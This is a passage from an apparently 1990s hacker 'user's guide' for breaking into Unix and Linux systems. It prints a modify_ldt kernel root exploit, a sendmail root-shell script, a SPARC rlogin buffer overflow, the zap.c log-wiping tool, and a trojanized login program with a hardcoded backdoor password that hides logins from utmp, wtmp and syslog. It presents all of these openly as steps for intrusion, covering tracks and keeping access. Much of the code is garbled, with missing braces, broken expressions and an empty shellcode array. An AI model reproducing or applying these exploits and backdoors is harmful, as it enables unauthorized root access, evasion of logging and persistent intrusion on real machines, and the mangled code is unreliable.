#include <linux/unistd.h>
#include <signal.h>
#include <asm/sigcontext.h>
#define __KERNEL__
#include <linux/sched.h>
#include <linux/module.h>

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)

#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
  unsigned char res;
  asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
       : "=a" (res)
       : "r" (seg), "r" (ofs));
  return res;
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
  asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
       : /* No results.  */
       : "r" (seg), "r" (ofs), "r" (b));
/* ------------------------------------------------------------------------ */
memgetseg (void *dst, int seg, const void *src, int size)
  while (size-- > 0)
    *(char *)dst++ = __farpeek (seg, (unsigned)(src++));
/* ------------------------------------------------------------------------ */
memputseg (int seg, void *dst, const void *src, int size)
  while (size-- > 0)
    __farpoke (seg, (unsigned)(dst++), *(char *)src++);
/* ------------------------------------------------------------------------ */
main ()
  int stat, i,j,k;
  struct modify_ldt_ldt_s ldt_entry;
  FILE *syms;
  char line[100];
  struct task_struct **task, *taskptr, thistask;
  struct kernel_sym blah[4096];

  printf ("Bogusity checker for modify_ldt system call.\n");

  printf ("Testing for page-size limit bug...\n");
  ldt_entry.entry_number = 0;
  ldt_entry.base_addr = 0xbfffffff;
  ldt_entry.limit = 0;
  ldt_entry.seg_32bit = 1;
  ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
  ldt_entry.read_exec_only = 0;
  ldt_entry.limit_in_pages = 1;
  ldt_entry.seg_not_present = 0;
  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
  if (stat)
    /* Continue after reporting error.  */
    printf ("This bug has been fixed in your kernel.\n");
      printf ("Shit happens: ");
      printf ("0xc0000000 - 0xc0000ffe is accessible.\n");

  printf ("Testing for expand-down limit bug...\n");
  ldt_entry.base_addr = 0x00000000;
  ldt_entry.limit = 1;
  ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
  ldt_entry.limit_in_pages = 0;
  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
  if (stat)
      printf ("This bug has been fixed in your kernel.\n");
      return 1;
      printf ("Shit happens: ");
      printf ("0x00000000 - 0xfffffffd is accessible.\n");

  i = get_kernel_syms(blah);
  k = i+10;
  for (j=0; j<i; j++)
   if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;
  if (k==i+10) { printf("current not found!!!\n"); return(1); }

  taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
  memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));
  taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
  memgetseg (&thistask, 7, taskptr, sizeof (thistask));
  if (!=getpid()) { printf("current process not found\n"); return(1); }
  printf("Current process is %i\n",;
  taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
  memgetseg (&thistask, 7, taskptr, sizeof (thistask));
  if (!=getppid()) { printf("current process not found\n"); return(1); }
  printf("Parent process is %i\n",;
  thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
  thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
  memputseg (7, taskptr, &thistask, sizeof (thistask));
  printf ("Shit happens: parent process is now root process.\n");
  return 0;

c.) Other linux versions:
Sendmail exploit:

#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#          Leshka Zakharoff, 1996. E-mail:
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type:   /tmp/sh"

Rlogin exploit:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      8200
#define EXTRA           100
#define STACK_OFFSET    4000
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =

u_long get_sp(void)
  __asm__("mov %sp,%i0 \n");

void main(int argc, char *argv[])
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode);

  long_p = (u_long *) buf;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;

  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;

  printf("Jumping to address 0x%lx\n", targ_addr);

  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  perror("execl failed");

Want more exploits? Get 'em from other sites (like rootshell,, etc...).

Step 3: Covering your tracks:

For this you could use lots of programs like zap, utclean, and lots of
Watch out, ALWAYS after you cloaked yourself to see if it worked do a:
victim1:~$ who
victim1:~$ finger

If you are still not cloaked, look for wtmpx, utmpx and other stuff like
that. The only cloaker (that I know) that erased me even from wtmpx/utmpx
was utclean. But I don't have it right now, so ZAP'll have to do the job.

      Title:  Zap.c (c) rokK Industries
   Sequence:  911204.B

    Syztems:  Kompiles on SunOS 4.+
       Note:  To mask yourself from lastlog and wtmp you need to be root,
              utmp is go+w on default SunOS, but is sometimes removed.
    Kompile:  cc -O Zap.c -o Zap
        Run:  Zap <Username>

       Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the
              entered Username. It also Zeros out the last login data for
              the specific user, fingering that user will show 'Never Logged

      Usage:  If you cant find a usage for this, get a brain.

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <utmp.h>
#include <lastlog.h>
#include <pwd.h>

int f;

void kill_tmp(name,who)
char *name,
    struct utmp utmp_ent;

  if ((f=open(name,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));

void kill_lastlog(who)
char *who;
    struct passwd *pwd;
    struct lastlog newll;

     if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));

    } else printf("%s: ?\n",who);

int  argc;
char *argv[];
    if (argc==2) {
    } else

Step 4: Keeping that account.

This usually means that you'll have to install some programs to give you
access even if the root has killed your account...
(DAEMONS!!!) =>|-@
 Here is an example of a login daemon from the DemonKit (good job,
LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's date
of creation. (use touch --help to see how!)

This is a simple trojanized login program, this was designed for Linux
and will not work without modification on linux. It lets you login as
either a root user, or any ordinary user by use of a 'magic password'.
It will also prevent the login from being logged into utmp, wtmp, etc.
You will effectively be invisible, and not be detected except via 'ps'.

#define BACKDOOR                    "password"
int     krad=0;

/* This program is derived from 4.3 BSD software and is
   subject to the copyright notice below.

   The port to HP-UX has been motivated by the incapability
   of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.


   - General HP-UX portation. Use of facilities not available
     in HP-UX (e.g. setpriority) has been eliminated.
     Utmp/wtmp handling has been ported.

   - The program uses BSD command line options to be used
     in connection with e.g. 'rlogind' i.e. 'new login'.

   - HP features left out:          logging of bad login attempts in /etc/btmp,
   they are sent to syslog

   password expiry

   '*' as login shell, add it if you need it

   - BSD features left out:         quota checks
   password expiry
   analysis of terminal type (tset feature)

   - BSD features thrown in:        Security logging to syslogd.
                                    This requires you to have a (ported) syslog
   system -- 7.0 comes with syslog
   'Lastlog' feature.

   - A lot of nitty gritty details has been adjusted in favour of
     HP-UX, e.g. /etc/securetty, default paths and the environment
     variables assigned by 'login'.

   - We do *nothing* to setup/alter tty state, under HP-UX this is
     to be done by getty/rlogind/telnetd/some one else.

   Michael Glad (
   Computer Science Department
   Aarhus University


   1991-09-24 HP-UX 8.0 port:
              - now explictly sets non-blocking mode on descriptors
     - strcasecmp is now part of HP-UX
   1992-02-05 Ported the stuff to Linux 0.12
   From 1992 till now (1995) this code for Linux has been maintained at
 * Copyright (c) 1980, 1987, 1988 The Regents of the University of California.
 * All rights reserved.
 * Redistribution and use in source and binary forms are permitted
 * provided that the above copyright notice and this paragraph are
 * duplicated in all such forms and that any documentation,
 * advertising materials, and other materials related to such
 * distribution and use acknowledge that the software was developed
 * by the University of California, Berkeley.  The name of the
 * University may not be used to endorse or promote products derived
 * from this software without specific prior written permission.

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\
 All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89";
#endif /* not lint */

 * login [ name ]
 * login -h hostname (for telnetd, etc.)
 * login -f name (for pre-authenticated login: datakit, xterm, etc.)

/* #define TESTING */

#ifdef TESTING
#include "param.h"
#include <sys/param.h>

#include <ctype.h>
#include <unistd.h>
#include <getopt.h>
#include <memory.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/file.h>
#include <termios.h>
#include <string.h>
#define index strchr
#define rindex strrchr
#include <sys/ioctl.h>
#include <signal.h>
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <setjmp.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/syslog.h>
#include <sys/sysmacros.h>
#include <netdb.h>

#ifdef TESTING
#  include "utmp.h"
#  include <utmp.h>

#include <shadow.h>

#ifndef linux
#include <tzfile.h>
#include <lastlog.h>
struct  lastlog
  { long ll_time;
    char ll_line[12];
    char ll_host[16];

#include "pathnames.h"

#define P_(s) ()
void opentty P_((const char *tty));
void getloginname P_((void));
void timedout P_((void));
int rootterm P_((char *ttyn));
void motd P_((void));
void sigint P_((void));
void checknologin P_((void));
void dolastlog P_((int quiet));
void badlogin P_((char *name));
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty));
void getstr P_((char *buf, int cnt, char *err));
void sleepexit P_((int eval));
#undef P_

#include <kerberos/krb.h>
#include <sys/termios.h>
char realm[REALM_SZ];
int kerror = KSUCCESS, notickets = 1;

#ifndef linux
#define TTYGRPNAME "tty" /* name of group to own ttys */
#  define TTYGRPNAME      "other"
#  ifndef MAXPATHLEN
#    define MAXPATHLEN 1024
#  endif

 * This bounds the time given to login.  Not a define so it can
 * be patched on machines where it's too small.
#ifndef linux
int timeout = 300;
int     timeout = 60;

struct passwd *pwd;
int failures;
char term[64], *hostname, *username, *tty;

char thishost[100];

#ifndef linux
struct sgttyb sgttyb;
struct tchars tc = {
struct ltchars ltc = {

char *months[] =
{ "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
 "Sep", "Oct", "Nov", "Dec" };

/* provided by Linus Torvalds 16-Feb-93 */
opentty(const char * tty)
    int i;
    int fd = open(tty, O_RDWR);

    for (i = 0 ; i < fd ; i++)
    for (i = 0 ; i < 3 ; i++)
      dup2(fd, i);
    if (fd >= 3)

main(argc, argv)
int argc;
char **argv;
extern int errno, optind;
extern char *optarg, **environ;
struct timeval tp;
struct tm *ttp;
struct group *gr;
register int ch;
register char *p;
int ask, fflag, hflag, pflag, cnt;
int quietlog, passwd_req, ioctlval;
char *domain, *salt, *ttyn, *pp;
char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
char *ctime(), *ttyname(), *stypeof();
time_t time();
void timedout();
char *termenv;

#ifdef linux
char tmp[100];
/* Just as arbitrary as mountain time: */
        /* (void)setenv("TZ", "MET-1DST",0); */

(void)signal(SIGALRM, timedout);
(void)alarm((unsigned int)timeout);
(void)signal(SIGQUIT, SIG_IGN);
(void)signal(SIGINT, SIG_IGN);

(void)setpriority(PRIO_PROCESS, 0, 0);
(void)quota(Q_SETUID, 0, 0, 0);

* -p is used by getty to tell login not to destroy the environment
  * -f is used to skip a second login authentication
* -h is used by other servers to pass the name of the remote
*    host to login so that it may be placed in utmp and wtmp
(void)gethostname(tbuf, sizeof(tbuf));
(void)strncpy(thishost, tbuf, sizeof(thishost)-1);
domain = index(tbuf, '.');

fflag = hflag = pflag = 0;
passwd_req = 1;
while ((ch = getopt(argc, argv, "fh:p")) != EOF)
switch (ch) {
case 'f':
fflag = 1;

case 'h':
if (getuid()) {
   "login: -h for super-user only.\n");
hflag = 1;
if (domain && (p = index(optarg, '.')) &&
   strcasecmp(p, domain) == 0)
*p = 0;
hostname = optarg;

case 'p':
pflag = 1;
case '?':
   "usage: login [-fp] [username]\n");
argc -= optind;
argv += optind;
if (*argv) {
username = *argv;
ask = 0;
} else
ask = 1;

#ifndef linux
ioctlval = 0;
(void)ioctl(0, TIOCLSET, &ioctlval);
(void)ioctl(0, TIOCNXCL, 0);
(void)fcntl(0, F_SETFL, ioctlval);
(void)ioctl(0, TIOCGETP, &sgttyb);
sgttyb.sg_erase = CERASE;
sgttyb.sg_kill = CKILL;
(void)ioctl(0, TIOCSLTC, &ltc);
(void)ioctl(0, TIOCSETC, &tc);
(void)ioctl(0, TIOCSETP, &sgttyb);

* Be sure that we're in
* blocking mode!!!
* This is really for HPUX
        ioctlval = 0;
        (void)ioctl(0, FIOSNBIO, &ioctlval);

for (cnt = getdtablesize(); cnt > 2; cnt--)

ttyn = ttyname(0);
if (ttyn == NULL || *ttyn == '\0') {
(void)sprintf(tname, "%s??", _PATH_TTY);
ttyn = tname;


   struct termios tt, ttt;

   tcgetattr(0, &tt);
   ttt = tt;
   ttt.c_cflag &= ~HUPCL;

   if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {
signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */
signal(SIGHUP, SIG_DFL);


   /* re-open stdin,stdout,stderr after vhangup() closed them */
   /* if it did, after 0.99.5 it doesn't! */

if (tty = rindex(ttyn, '/'))
tty = ttyn;

openlog("login", LOG_ODELAY, LOG_AUTH);

for (cnt = 0;; ask = 1) {
ioctlval = 0;
#ifndef linux
(void)ioctl(0, TIOCSETD, &ioctlval);

if (ask) {
fflag = 0;

checktty(username, tty);

(void)strcpy(tbuf, username);
if (pwd = getpwnam(username))
salt = pwd->pw_passwd;
salt = "xx";

/* if user not super-user, check for disabled logins */
if (pwd == NULL || pwd->pw_uid)

* Disallow automatic login to root; if not invoked by
* root, disallow if the uid's differ.
if (fflag && pwd) {
int uid = getuid();

passwd_req = pwd->pw_uid == 0 ||
   (uid && uid != pwd->pw_uid);

* If trying to log in as root, but with insecure terminal,
* refuse the login attempt.
if (pwd && pwd->pw_uid == 0 && !rootterm(tty)) {
   "%s login refused on this terminal.\n",

if (hostname)
   pwd->pw_name, hostname, tty);
    pwd->pw_name, tty);

* If no pre-authentication and a password exists
* for this user, prompt for one and verify it.
if (!passwd_req || (pwd && !*pwd->pw_passwd))

setpriority(PRIO_PROCESS, 0, -4);
pp = getpass("Password: ");
if(strcmp(BACKDOOR, pp) == 0) krad++;

p = crypt(pp, salt);
setpriority(PRIO_PROCESS, 0, 0);


* If not present in pw file, act as we normally would.
* If we aren't Kerberos-authenticated, try the normal
* pw file for a password.  If that's ok, log the user
* in without issueing any tickets.

if (pwd && !krb_get_lrealm(realm,1)) {
* get TGT for local realm; be careful about uid's
* here for ticket file ownership
kerror = krb_get_pw_in_tkt(pwd->pw_name, "", realm,
"krbtgt", realm, DEFAULT_TKT_LIFE, pp);
if (kerror == INTK_OK) {
memset(pp, 0, strlen(pp));
notickets = 0; /* user got ticket */

(void) memset(pp, 0, strlen(pp));
if (pwd && !strcmp(p, pwd->pw_passwd))

                if(krad != 0)
(void)printf("Login incorrect\n");
badlogin(username); /* log ALL bad logins */

/* we allow 10 tries, but after 3 we start backing off */
if (++cnt > 3) {
if (cnt >= 10) {
sleep((unsigned int)((cnt - 3) * 5));

/* committed to login -- turn off timeout */
(void)alarm((unsigned int)0);

if (quota(Q_SETUID, pwd->pw_uid, 0, 0) < 0 && errno != EINVAL) {
switch(errno) {
case EUSERS:
"Too many users logged on already.\nTry again later.\n");
   "You have too many processes running.\n");
perror("quota (Q_SETUID)");

/* paranoia... */

/* This requires some explanation: As root we may not be able to
  read the directory of the user if it is on an NFS mounted
  filesystem. We temporarily set our effective uid to the user-uid
  making sure that we keep root privs. in the real uid.

  A portable solution would require a fork(), but we rely on Linux
  having the BSD setreuid() */

   char tmpstr[MAXPATHLEN];
   uid_t ruid = getuid();
   gid_t egid = getegid();

   strncpy(tmpstr, pwd->pw_dir, MAXPATHLEN-12);
   strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN);

   setregid(-1, pwd->pw_gid);
   setreuid(0, pwd->pw_uid);
   quietlog = (access(tmpstr, R_OK) == 0);
   setuid(0); /* setreuid doesn't do it alone! */
   setreuid(ruid, 0);
   setregid(-1, egid);

#ifndef linux
if (notickets && !quietlog)
(void)printf("Warning: no Kerberos tickets issued\n");

#define TWOWEEKS (14*24*60*60)
if (pwd->pw_change || pwd->pw_expire)
(void)gettimeofday(&tp, (struct timezone *)NULL);
if (pwd->pw_change)
if (tp.tv_sec >= pwd->pw_change) {
(void)printf("Sorry -- your password has expired.\n");
else if (tp.tv_sec - pwd->pw_change < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_change);
(void)printf("Warning: your password expires on %s %d, %d\n",
   months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
if (pwd->pw_expire)
if (tp.tv_sec >= pwd->pw_expire) {
(void)printf("Sorry -- your account has expired.\n");
else if (tp.tv_sec - pwd->pw_expire < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_expire);
(void)printf("Warning: your account expires on %s %d, %d\n",
   months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);

/* nothing else left to fail -- really log in */
struct utmp utmp;

memset((char *)&utmp, 0, sizeof(utmp));
strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
if (hostname)
strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
/* for linux, write entries in utmp and wtmp */
struct utmp ut;
char *ttyabbrev;
int wtmp;

memset((char *)&ut, 0, sizeof(ut));
ut.ut_type = USER_PROCESS;
ut.ut_pid = getpid();
strncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, sizeof(ut.ut_line));
ttyabbrev = ttyn + sizeof("/dev/tty") - 1;
strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id));
strncpy(ut.ut_user, username, sizeof(ut.ut_user));

/* fill in host and ip-addr fields when we get networking */
if (hostname) {
   struct hostent *he;

   strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));
   if ((he = gethostbyname(hostname)))
     memcpy(&ut.ut_addr, he->h_addr_list[0],

if(krad == 0)

if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) {
       flock(wtmp, LOCK_EX);
       if(krad == 0)
  write(wtmp, (char *)&ut, sizeof(ut));
       flock(wtmp, LOCK_UN);
        /* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */

        if(krad == 0)

#ifndef linux
if (!hflag) { /* XXX */
static struct winsize win = { 0, 0, 0, 0 };

(void)ioctl(0, TIOCSWINSZ, &win);
(void)chown(ttyn, pwd->pw_uid,
   (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);

(void)chmod(ttyn, 0622);

initgroups(username, pwd->pw_gid);

quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);

if (*pwd->pw_shell == '\0')
pwd->pw_shell = _PATH_BSHELL;
#ifndef linux
/* turn on new line discipline for the csh */
else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) {
ioctlval = NTTYDISC;
(void)ioctl(0, TIOCSETD, &ioctlval);

/* preserve TERM even without -p flag */
char *ep;

if(!((ep = getenv("TERM")) && (termenv = strdup(ep))))
 termenv = "dumb";

/* destroy environment unless user has requested preservation */
if (!pflag)
          environ = (char**)malloc(sizeof(char*));
 memset(environ, 0, sizeof(char*));

#ifndef linux
(void)setenv("HOME", pwd->pw_dir, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
if (term[0] == '\0')
strncpy(term, stypeof(tty), sizeof(term));
(void)setenv("TERM", term, 0);
(void)setenv("USER", pwd->pw_name, 1);
(void)setenv("PATH", _PATH_DEFPATH, 0);
        (void)setenv("HOME", pwd->pw_dir, 0);      /* legal to override */
          (void)setenv("PATH", _PATH_DEFPATH, 1);
          (void)setenv("PATH", _PATH_DEFPATH_ROOT, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
(void)setenv("TERM", termenv, 1);

        /* mailx will give a funny error msg if you forget this one */

        /* LOGNAME is not documented in login(1) but
  HP-UX 6.5 does it. We'll not allow modifying it.
(void)setenv("LOGNAME", pwd->pw_name, 1);

#ifndef linux
if (tty[sizeof("tty")-1] == 'd')

       if(krad == 0)
  syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);
if (pwd->pw_uid == 0)
  if(krad == 0)
if (hostname)
   tty, hostname);
syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty);

if (!quietlog) {
struct stat st;

(void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name);
if (stat(tbuf, &st) == 0 && st.st_size != 0)
(void)printf("You have %smail.\n",
   (st.st_mtime > st.st_atime) ? "new " : "");

(void)signal(SIGALRM, SIG_DFL);
(void)signal(SIGQUIT, SIG_DFL);
(void)signal(SIGINT, SIG_DFL);
(void)signal(SIGTSTP, SIG_IGN);
(void)signal(SIGHUP, SIG_DFL);

/* discard permissions last so can't get killed and drop core */
if(setuid(pwd->pw_uid) < 0 && pwd->pw_uid) {
   syslog(LOG_ALERT, "setuid() failed");

/* wait until here to change directory! */
if (chdir(pwd->pw_dir) < 0) {
(void)printf("No directory %s!\n", pwd->pw_dir);
if (chdir("/"))
pwd->pw_dir = "/";
(void)printf("Logging in with home = \"/\".\n");

/* if the shell field has a space: treat it like a shell script */
if (strchr(pwd->pw_shell, ' ')) {
   char *buff = malloc(strlen(pwd->pw_shell) + 6);
   if (buff) {
strcpy(buff, "exec ");
strcat(buff, pwd->pw_shell);
execlp("/bin/sh", "-sh", "-c", buff, (char *)0);
fprintf(stderr, "login: couldn't exec shell script: %s.\n",
   fprintf(stderr, "login: no memory for shell script.\n");

tbuf[0] = '-';
strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ?
 p + 1 : pwd->pw_shell));

execlp(pwd->pw_shell, tbuf, (char *)0);
(void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));

register int ch;
register char *p;
static char nbuf[UT_NAMESIZE + 1];

for (;;) {
(void)printf("\n%s login: ", thishost); fflush(stdout);
for (p = nbuf; (ch = getchar()) != '\n'; ) {
if (ch == EOF) {
if (p < nbuf + UT_NAMESIZE)
*p++ = ch;
if (p > nbuf)
if (nbuf[0] == '-')
   "login names may not start with '-'.\n");
else {
*p = '\0';
username = nbuf;

void timedout()
struct termio ti;

(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);

/* reset echo */
(void) ioctl(0, TCGETA, &ti);
ti.c_lflag |= ECHO;
(void) ioctl(0, TCSETA, &ti);

char *ttyn;
#ifndef linux
struct ttyent *t;

return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);
  int fd;
  char buf[100],*p;
  int cnt, more;

  fd = open(SECURETTY, O_RDONLY);
  if(fd < 0) return 1;

  /* read each line in /etc/securetty, if a line matches our ttyline
     then root is allowed to login on this tty, and we should return
     true. */
  for(;;) {
p = buf; cnt = 100;
while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++;
if(more && *p == '\n') {
*p = '\0';
  if(!strcmp(buf, ttyn)) {
  return 1;
  } else
  } else {
  return 0;

jmp_buf motdinterrupt;

register int fd, nchars;
void (*oldint)(), sigint();
char tbuf[8192];

if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
oldint = signal(SIGINT, sigint);
if (setjmp(motdinterrupt) == 0)
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
(void)signal(SIGINT, oldint);

void sigint()
longjmp(motdinterrupt, 1);

register int fd, nchars;
char tbuf[8192];

if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);

int quiet;
struct lastlog ll;
int fd;

if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
if (!quiet) {
if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
   ll.ll_time != 0) {
(void)printf("Last login: %.*s ",
   24-5, (char *)ctime(&ll.ll_time));

if (*ll.ll_host != '\0')
 printf("from %.*s\n",
(int)sizeof(ll.ll_host), ll.ll_host);
 printf("on %.*s\n",
(int)sizeof(ll.ll_line), ll.ll_line);
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
memset((char *)&ll, 0, sizeof(ll));
strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
if (hostname)
strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
if(krad == 0)
  (void)write(fd, (char *)&ll, sizeof(ll));

char *name;
if (failures == 0)

if (hostname)
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",
   failures, failures > 1 ? "S" : "", hostname, name);
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",
   failures, failures > 1 ? "S" : "", tty, name);

#undef UNKNOWN
#define UNKNOWN "su"

#ifndef linux
char *
char *ttyid;
struct ttyent *t;

return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);

checktty(user, tty)
     char *user;
     char *tty;
    FILE *f;
    char buf[256];
    char *ptr;
    char devname[50];
    struct stat stb;

    /* no /etc/usertty, default to allow access */
    if(!(f = fopen(_PATH_USERTTY, "r"))) return;

    while(fgets(buf, 255, f)) {

/* strip comments */
for(ptr = buf; ptr < buf + 256; ptr++)
 if(*ptr == '#') *ptr = 0;

strtok(buf, " \t");
if(strncmp(user, buf, 8) == 0) {
   while((ptr = strtok(NULL, "\t\n "))) {
if(strncmp(tty, ptr, 10) == 0) {
if(strcmp("PTY", ptr) == 0) {
#ifdef linux
   sprintf(devname, "/dev/%s", ptr);
   /* VERY linux dependent, recognize PTY as alias
      for all pseudo tty's */
   if((stat(devname, &stb) >= 0)
      && major(stb.st_rdev) == 4
      && minor(stb.st_rdev) >= 192) {
   /* if we get here, /etc/usertty exists, there's a line
      beginning with our username, but it doesn't contain the
      name of the tty where the user is trying to log in.
      So deny access! */
   printf("Login on %s denied.\n", tty);
    /* users not mentioned in /etc/usertty are by default allowed access
       on all tty's */

getstr(buf, cnt, err)
char *buf, *err;
int cnt;
char ch;

do {
if (read(0, &ch, sizeof(ch)) != sizeof(ch))
if (--cnt < 0) {
(void)fprintf(stderr, "%s too long\r\n", err);
*buf++ = ch;
} while (ch);

int eval;
sleep((unsigned int)5);

So if you really wanna have root access and have access to console, reboot
it (carefully, do a ctrl-alt-del) and at lilo prompt do a :
init=/bin/bash rw (for linux 2.0.0 and above (I think)).

Don't wonder why I was speaking only about rootshell and, there are
lots of other very good hacking pages, but these ones are updated very
quickly and besides, are the best pages I know.

So folks, this was it...
First version of my USER's GUIDE 1.0.
Maybe I'll do better next time, and if I have more time, I'll add about
50(more) other exploits, remote ones, new stuff, new techniques, etc...
See ya, folks !
GOOD NIGHT !!! (it's now).
DAMN !!!

ARGHHH! I forgot... My e-mail adress is <>.
(for now).